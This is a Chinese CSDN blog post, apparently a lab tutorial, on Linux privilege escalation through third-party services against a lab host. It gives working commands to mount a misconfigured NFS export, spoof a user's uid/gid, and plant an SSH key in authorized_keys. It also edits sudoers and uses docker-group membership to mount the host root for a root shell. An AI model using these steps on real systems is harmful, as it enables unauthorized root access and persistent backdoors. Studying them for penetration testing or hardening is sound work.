第三方服务提权

已于 2023-09-08 15:41:45 修改
阅读量271 收藏
点赞数
分类专栏: 内网渗透 文章标签: linux 运维 服务器
于 2023-09-08 13:29:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NSQ0207/article/details/132753657
版权

 nfs挂载原理

目标机器192.168.17.138 开启2049 nfs端口

查看目标开放的文件夹

showmount -e 192.168.17.138

回显:/home/peter *  说明可挂载/home/peter的所有目录

 使用WinSCP链接靶机192.168.17.138  

更改名字为 authorized_keys

 靶机

赋值权限

攻击机

nfs挂载提权实例

mount 192.168.17.138:/home/peter /nsq

查看是否挂载成功 

 该处为1001:1005

  创建用户 

在本机创建一个peter用户并且uid为1001  gid为1005即可
创建组并指定组GID:
groupadd -g 1005 peter

创建用户并指定uid以及gid:
adduser peter -uid 1001 -gid 1005

 sudo提权

修改用户的sudoers权限 

vim /etc/sudoers

 

添加peter  ALL=(ALL:ALL)ALL

查看用户权限 

 cat /etc/passwd

发现用户权限为1001:1005,成功 

进入peter用户 

 生成密钥

ssh-keygen

 保存公钥到创建的目录下

cat /home/peter/.ssh/id_rsa.pub > /nsq/.ssh/authorized_keys

赋值权限

chmod 700 .ssh
chmod 600 authorized_keys

链接成功

docker用户组提权

peter用户属于docker组,docker组的成员,那么可以根据此漏洞来获取root的shell

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

Serein_NSQ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
利用第三方软件提权
cxrpty的博客
03-12 1215
实验环境:windows2008 实验步骤: 一、搭建环境 1.关闭防火墙,在wwwroot写入yjh.aspx,密码为-7 2.用菜刀连接 二、实验操作 1.查看当前系统上所运行的软件:tasklist,可看是否运行了Filezilla server 2.用菜刀上传端口转发工具lcx.exe到temp文件夹 2.进行端口转发:lcx.exe -tran 14141127...
Windows提权---第三方软件提权、Bypass UAC提权
qq_40012781的博客
07-03 1777
第三方软件提权、Bypass UAC提权
Linux通过第三方应用提权实战总结
zhangge3663的博客
02-20 1521
Linux提权,前提是拿到了一个低权限的账号,能上传和下载文件,主要思路有: 1、内核提权。网上各种大佬的payload很多,关键在于要能找到利用哪个exp以及具体如何利用。省力点的方法是用searchsploit或者linux-exploit-suggester.sh来查找,熟悉之后难度也不大。 2、suid提权。这里也包含了sudo这种方式,两种方法的思路都是一样的,区别在于suid针对单个程序,sudo针对某个用户。这类提权方式的主要思路是:管理员授权普通用户去执行 root 权限的操作,而不需要
第三方提权
一个普普通通的博客
04-17 1987
第三方提权 可以进入注册表查看装了哪些软件 搜狗输入法提权 原理:通过搜狗输入法的权限不严格,在默认安装搜狗输入法时,权限予过大,everyone(所有)权限(绝对控制) 通过伪造exe文件,例如更新程序,在对方进行软件更新或内容更新时,自动执行提前写好的bat脚本(quick batch) FileZilla、ftp、迅雷、搜狗输入法、vnc、老版本360等第三方软件的特别版本均存在此提权方法 LPK劫持(dll劫持) 一种是需要程序本身的dll,根据函数仿制一个dll 另一种是直接生成一个恶意dl
一文了解提权:溢出提权第三方组件提权
闵行小鱼塘
05-04 2039
提权做个归纳,提权一般分为两种——溢出提权第三方组件提权
渗透测试技术----提权(第三方提权和WCE)
wwl012345的博客
07-23 1699
一、Windows登录认证 1.登录认证过程 (1):用户登录时输入用户名和密码 (2):对输入的密码进行lmhash和nthash加密 (3):对加密的密码与系统中的SAM文件进行比对 (4):SAM文件中存放的是用户的用户名和密码的hash值,如果比对成功就可以进行登录,否则登录不成功。 2.SAM介绍 Windows中对用户账户的安全管理使用了安全账号管理器SAM(security a...
linux 提权总结
weixin_51681694的博客
06-13 6842
会继续补充.....
第三方组件提权-SQL server提权
Love&Share
11-20 2556
文章目录基础MSSQL权限级别拿webshellxp_cmdshell执行系统命令LOG备份getshell提权使用xp_cmdshell进行提权以下内容为转载使用sp_oacreate进行提权|无回显sp_oacreate简介sp_oacreate使用沙盒提权SQL Server 沙盒简介JOB提权使用xp_regwrite提权 | 映像劫持提权其他骚操作使用sp_makewebtask写文件总结二级内网MSSQL渗透|上线CS 基础 MSSQL(MicroSoft SQL Server数据库),是微软.
Linux提权--第三方软件MYSQL数据库提权(WEB+本地)
金灰的博客
05-12 841
免责声明:本文仅做技术交流与学习,非法搞事后果自负...
提权—网站的权限后台漏洞第三方
qi_SJQ_的博客
01-30 4139
1.权限提升: 此处提权指的不是让网站的普通用户获取到管理员的权限(那属于网站的逻辑漏洞)而是我们已经利用网站的漏洞拿到了一些权限乃至webshell后如何利用网站权限进而获取到数据库、操作系统、服务器等的权限。 2.具体有哪些权限需要我们知道和了解掌握的? 后台权限、网站权限、数据库权限、接口权限、系统权限、域控权限等。 1)后台权限(获得方式:爆破、注入猜解、弱口令等):一般网站或应用后台智能操作应用的界面内容、数据图片等信息,无法操作程序的源代码或服务器上的资源文件。(如后台功能存在文件操作的话.
星外提权工具
07-23
寻找服务器上安装的第3方软件某些文件的权限问题来进行文件替换,将这些文件替换为我们的cmd.exe和cscript.exe来提权,经我测试发现以下服务器常用软件的某些文件权限为Everyone即为所有用户权限,可以修改,可以...
法客周年庆++之通杀Hzhost主机+和提权思路的总结
02-22
本篇文章主要总结了Hzhost主机的提权思路,包括信息收集、服务器软件利用、可写可执行目录查找和服务器上安装的第三方软件文件权限问题等多方面的知识点。 一、信息收集 信息收集是提权的关键环节,包括服务器是否...
014-红队测试之Linux提权小结.pdf
09-20
Linux常见的提权攻击者们选择的下手点有多种,如内核漏洞、定时任务、Suid文件、sudo配置错误、NFS共享、第三方服务等。这些下手点在攻击者的视角下,都是可怕的漏洞,但是对普通的IT运维人员来说,这些“下手点”...
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
#数据库应用提权权限提升中的意义#WEB 或本地环境如何探针数据库应用#数据库提权权限用户密码收集等方法#目前数据库提权对应的技术及方法等演示案例:Redis
2023新版泛目录站群,自动养站,聚合源码,养站提权神器
05-13
1、自主研发程序,不依赖于第三方CMS; 2、图片列表,图片会经过AI重写,保证原创度; 3、根据指定关键词来自动生成相关标题,并根据标题AI创作内容; 4、模板支持自定义,有详细的[标签]说明; 5、内置百度API...
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
最新发布
appearappear的博客
06-12 272
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
Linux基础命令
威桑的博客
06-11 1191
常见基础Linux命令
Linux下的动态链接和静态链接 及 调用libevent库函数的可执行文件无法正常运行情况剖析】
一起学习进步!
06-09 342
静态链接是指在编译时,将程序所依赖的函数或数据直接复制到最终的可执行文件中。这意味着可执行文件包含了程序运行所需的所有代码和数据。动态链接是指在运行时,程序所依赖的函数或数据从外部的共享库(shared library)中加载。这意味着可执行文件只包含了必要的引用信息,而实际的代码和数据则存储在外部的共享库中。
NVIDIA Jetson Linux 35.3.1-开发指南-Jetson软件架构
FREEDOM_X的专栏
06-11 774
下图显示了NVIDIA®Jetson™Linux架构。以下部分描述了每个模块的组件。在本开发人员指南或其他地方,许多组件的名称是指向组件主留档的链接。一些组件具有带有附加描述的单独链接。
微信第三方服务sass模式
06-03
微信第三方服务SaaS模式指的是将微信开放平台作为基础,提供类似于软件即服务(SaaS)的服务模式。具体来说,第三方服务提供商将自己的服务集成到微信开放平台上,并提供给公众号或小程序使用。公众号或小程序的开发者可以通过调用第三方服务提供商的接口,实现各种功能,如客服、支付、营销等。第三方服务提供商可以通过收取开发者的服务费用,获得收益。这种模式可以让开发者更加专注于公众号或小程序的业务开发,同时也可以让第三方服务提供商更加专注于服务的优化和升级。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值